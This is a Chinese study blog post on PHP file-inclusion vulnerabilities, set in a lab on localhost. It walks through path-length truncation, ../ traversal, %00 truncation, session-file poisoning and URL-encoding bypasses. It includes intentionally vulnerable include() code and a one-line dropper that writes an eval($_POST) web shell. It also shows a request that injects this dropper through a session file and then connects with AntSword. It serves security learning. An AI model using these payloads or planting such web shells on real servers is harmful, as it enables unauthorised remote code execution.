任意文件包含漏洞（2）

叁歲伎倆 2022-11-29 12:47 205阅读 0赞

### 目录 ###

*   *  windows系统
     *   *  1.路径长度绕过
         *   *  简介
         *  2. ../绕过
         *  2.5 ./
         *  3. %00截断
         *   *  简介
             *  使用条件
             *  操作
         *  4.session 文件
         *   *  使用条件
             *  操作
         *  5.错误日志
         *  编码绕过
     *  linux系统
     *   *  路径长度绕过
         *  错误日志

## windows系统 ##

### 1.路径长度绕过 ###

**wj.php**

<?php
    $a=@$_GET['123'];
    include($a.'.html');
    ?>

如果限制了文件类型，比如这里只能包含html后缀的文件，那么就可以使用此方法

#### 简介 ####

操作系统存在最大路径长度的限制。`windows系统，文件名最长256个字符`，可以输入超过最大路径长度的目录，这样系统就会将后面的路径丢弃，导致扩展名被中途截断

在文件后面加`.`  
如：  
`info.php...........................................................................................................................................................................................................................................................................................html`

`.`超过256个就行，后面多出来的`...........................................html`不会被识别到

![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80NTY2MzkwNQ_size_16_color_FFFFFF_t_70_pic_center]  
**info.php**

<?php
    phpinfo();
    ?>

### 2. …/绕过 ###

有时候会限制文件包含的路径，比如`当前路径`  
`./`当前目录  
`../`上级目录  
`/`根目录

<?php
    $a=@$_GET['123'];
    include('./'.$a.'.php');
    ?>

如果说路径长度绕过是为了干掉`$a`后面的`'php'`，那么`../`就是为了干掉`$a`前面的`'./'`

![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80NTY2MzkwNQ_size_16_color_FFFFFF_t_70_pic_center 1]

### 2.5 ./ ###

`./` 之所以放在2.5的位置  
是因为他放的位置不同，作用也不同  
如 `info.php./././././././……././././././html`  
则和1 `.` 的作用一样，绕过后缀

如果是`./info.php`  
则后2`../`的作用一样，绕过路径（尽管`./`表示当前路径，默认就是表示包含当前路径的文件，所以加不加都无所谓）

### 3. %00截断 ###

#### 简介 ####

%00被认为是结束符，后面的数据会被直接忽略，导致扩展名截断。  
攻击者可以利用这个漏洞绕过扩展名过滤

和00截断有同样效果的还有：`?`、 `#`（\#必须写成%23）

#### 使用条件 ####

(1) magic\_quotes\_gpc=off  
(2) PHP<5.3.4

详见此文  
[https://blog.csdn.net/weixin\_45663905/article/details/107559653][https_blog.csdn.net_weixin_45663905_article_details_107559653]

#### 操作 ####

scshell.php

<?php fputs(fopen('data.php','w'),'<?php eval($_POST[123])?>');?>

### 4.session 文件 ###

#### 使用条件 ####

session文件的内容可控的，而且session文件的保存目录已知，或者保存在默认目录，管理员没有改

可以通过phpinfo()来查找session的路径  
![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80NTY2MzkwNQ_size_16_color_FFFFFF_t_70_pic_center 3]

#### 操作 ####

sess.php

<?php
    session_start();
    $ctfs=$_GET['se'];
    $_SESSION["username"]=$ctfs;
    ?>

1.在url里面上输入想加入session的内容

http://127.0.0.1/cy/sess.php?se=<?php fputs(fopen('data2.php','w'),'<?php eval($_POST[123])?>');?>

使用F12，点存储，按cookie，看session  
![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80NTY2MzkwNQ_size_16_color_FFFFFF_t_70_pic_center 4]  
这里4d14ba13dfd1e23c0476a8a887ca5602就是此session的文件名  
但是默认有个sess前缀，即应该为sess\_4d14ba13dfd1e23c0476a8a887ca5602

查看该session文件

http://127.0.0.1/cy/wj.php?123=../../tmp/tmp/sess_4d14ba13dfd1e23c0476a8a887ca5602%00

发现没什么显示  
![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80NTY2MzkwNQ_size_16_color_FFFFFF_t_70_pic_center 5]

此时上帝视角，进入tmp目录，发现了sess文件已经写进脚本  
啥？你说为啥能访问www目录之外的tmp文件。  
php是一门语言，它能访问的不仅仅只是web程序，利用文件里的函数，web程序之外的文件自然也能访问

![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80NTY2MzkwNQ_size_16_color_FFFFFF_t_70_pic_center 6]  
而且在sess.php同目录下，已经生成了一个data2.php文件，  
![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80NTY2MzkwNQ_size_16_color_FFFFFF_t_70_pic_center 7]  
通过蚁剑连接data2.php文件

![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80NTY2MzkwNQ_size_16_color_FFFFFF_t_70_pic_center 8]

### 5.错误日志 ###

见[https://blog.csdn.net/weixin\_45663905/article/details/108148898][https_blog.csdn.net_weixin_45663905_article_details_108148898]

### 编码绕过 ###

这不算一种独立的绕过方式，  
如果在使用上面的方法里，看到过滤了`/` ,`.`,可以使用url编码绕过

/     %2f  
    .     %2e

但是在进行编码的时候，发现`.`编码后还是`.`,而`%2e`解码后却成了`.`，不知道是啥原因  
嗯学完这个知识点就去看url编码  
![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80NTY2MzkwNQ_size_16_color_FFFFFF_t_70_pic_center 9]

![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80NTY2MzkwNQ_size_16_color_FFFFFF_t_70_pic_center 10]

## linux系统 ##

### 路径长度绕过 ###

linux系统，文件名最长4096个字符(浏览器最多只能输入300多个字符，所以需要抓包)  
前面加`././././…………xx.php`

### 错误日志 ###

ssh连接失败，会保存到日志

……

[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80NTY2MzkwNQ_size_16_color_FFFFFF_t_70_pic_center]: /images/20221124/85d4b287f08343689f2dbe1f489c074a.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80NTY2MzkwNQ_size_16_color_FFFFFF_t_70_pic_center 1]: /images/20221124/16639d763ff944e4a86895759c521f9f.png
[https_blog.csdn.net_weixin_45663905_article_details_107559653]: https://blog.csdn.net/weixin_45663905/article/details/107559653
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80NTY2MzkwNQ_size_16_color_FFFFFF_t_70_pic_center 2]: /images/20221124/eb552f4adc844bc298a13849c900cc24.png
[20200821095421825.png_pic_center]: /images/20221124/f72e4ad5feca4a5bafed74bef088d7dd.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80NTY2MzkwNQ_size_16_color_FFFFFF_t_70_pic_center 3]: /images/20221124/4285b0341b6742109505a4d6eee02c4d.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80NTY2MzkwNQ_size_16_color_FFFFFF_t_70_pic_center 4]: /images/20221124/dde0b07daa174de0ae91834592526b83.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80NTY2MzkwNQ_size_16_color_FFFFFF_t_70_pic_center 5]: /images/20221124/f06f9082e4e64e15a9207cef1ebc4786.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80NTY2MzkwNQ_size_16_color_FFFFFF_t_70_pic_center 6]: /images/20221124/5571417cb68046f8bf87ebb8ca2cb5aa.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80NTY2MzkwNQ_size_16_color_FFFFFF_t_70_pic_center 7]: /images/20221124/280b395407204b6bac687f878ea87e28.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80NTY2MzkwNQ_size_16_color_FFFFFF_t_70_pic_center 8]: /images/20221124/b765bd7b14bb495a8517dcfc43d37604.png
[https_blog.csdn.net_weixin_45663905_article_details_108148898]: https://blog.csdn.net/weixin_45663905/article/details/108148898
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80NTY2MzkwNQ_size_16_color_FFFFFF_t_70_pic_center 9]: /images/20221124/5cf0ef430d014d5684e6849db7b2e25d.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80NTY2MzkwNQ_size_16_color_FFFFFF_t_70_pic_center 10]: /images/20221124/ec2be1e590074f16872d040d3cb79c4c.png